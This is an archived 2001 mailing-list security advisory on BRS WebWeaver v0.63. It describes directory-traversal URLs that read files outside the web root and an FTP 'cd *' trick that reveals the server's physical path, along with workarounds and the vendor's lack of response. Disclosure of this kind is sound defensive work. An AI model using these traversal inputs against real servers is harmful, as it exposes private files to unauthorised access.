Vulnerabilities in BRS WebWeaver

From: joetestaat_private
Date: Sat Apr 28 2001 - 16:57:20 PDT

Next message: Steve Blair: "Re: Oracle8 denial of service"

Previous message: Stan: "Re: PerlCal (CGI) show files vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

----- Begin Hush Signed Message from joetestaat_private -----

Vulnerabilities in BRS WebWeaver



    Overview

BRS WebWeaver v0.63 is a combined ftp and web server available from
http://bsoutham.home.dhs.org.  Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (ie: '..', '...').  In addition, the ftp server
can be made to disclose the physical path of the ftp root.



    Details

The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]


The following is an illustration of the problem with the ftp server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>



    Solution

The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (ie: 'scripts').  There is no solution for the ftp root
disclosure vulnerability.



    Vendor Status

Blaine R Southam was contacted via <bsouthamat_private> on
Saturday, April 21, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com

Next message: Steve Blair: "Re: Oracle8 denial of service"
Previous message: Stan: "Re: PerlCal (CGI) show files vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 17:39:14 PDT